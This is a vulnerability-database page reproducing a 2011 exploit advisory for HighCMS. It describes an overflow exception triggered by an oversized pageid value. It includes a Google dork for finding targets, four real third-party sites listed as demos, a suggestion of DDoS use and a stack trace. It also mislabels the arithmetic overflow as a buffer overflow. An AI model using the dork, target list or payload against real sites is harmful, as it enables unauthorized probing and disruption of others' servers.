Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HighCMS Overflow

🗓️ 30 Oct 2011 00:00:00Reported by BHG Security CenterType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

HighCMS index.aspx Buffer Overflow Vulnerability on Windows Server 200

Code
`----------------------------------------------------------------  
HighCMS <= (index.aspx) Buffer Overflow Vulnerability  
----------------------------------------------------------------  
  
# Exploit Title:HighCMS <= (index.aspx) Buffer Overflow Vulnerability  
# Google Dork: inurl:index.aspx?siteid=1&pageid=  
# Application Name: [HighCMS]  
# Date: 2011-10-30  
# Author: BHG Security Center  
# Home: Http://black-hg.org  
# Software Link: [ http://www.aryanic.com/products-highcms.html ]  
# Vendor Response(s): They didn't respond to the emails.  
# Version: [ 11.6 ]  
# Impact : [ Low ]  
# Tested on: [Windows Server 2003 /IIS 6.0]  
# CVE : Webapps  
  
+-----------------------+  
| Overflow Exception |  
+-----------------------+  
  
Description: You can use many of these vulnerabilities do Ddos attacks, including refref  
  
# PoC(s):  
  
http://[HOST]/index.aspx?siteid=1&pageid=[Overflow]  
  
http://[HOST]/index.aspx?siteid=1&pageid=4141414141 <> True   
  
# Demo(s):  
  
http://www.mayadin.biz/index.aspx?siteid=1&pageid=4141414141  
  
http://ielts-house.com/index.aspx?siteid=1&pageid=4141414141  
  
http://www.persiangoldfish.com/index.aspx?siteid=1&pageid=414141414141  
  
http://honarnews.org/index.aspx?siteid=1&pageid=4141414141  
  
# Output Data:  
  
[OverflowException: Arithmetic operation resulted in an overflow.]  
Microsoft.VisualBasic.CompilerServices.Conversions.ToInteger(String Value) +165  
highcms.index.page_select() +1272  
highcms.index.make_page() +2304  
highcms.index.Page_Load(Object , EventArgs ) +8725  
System.Web.UI.Control.OnLoad(EventArgs e) +132  
System.Web.UI.Control.LoadRecursive() +66  
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2428  
  
  
# Reference:  
[1] For more information about this vulnerability (URL: http://msdn.microsoft.com/en-us/library/system.overflowexception.aspx)  
[2] For more information about this vulnerability (URL: https://www.owasp.org/index.php/Buffer_Overflows)  
  
# Important Notes:  
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.  
  
# Greets To :  
  
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp   
  
ArYaIeIrAn ~ Mikili ~ NoL1m1t ~ cmaxx ~ G3n3Rall ~ Mr.XHat ~ cmaxx   
  
G3n3Rall ~ Mr.XHat ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter  
  
s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ ./Persian Gulf  
  
===========================================[End]=============================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Oct 2011 00:00Current
0.4Low risk
Vulners AI Score0.4
highcmsbuffer overflowvulnerabilitywindows server 2003ddos attacksrefrefcve webappsmsvdnowasp buffer overflowsvendor response.
28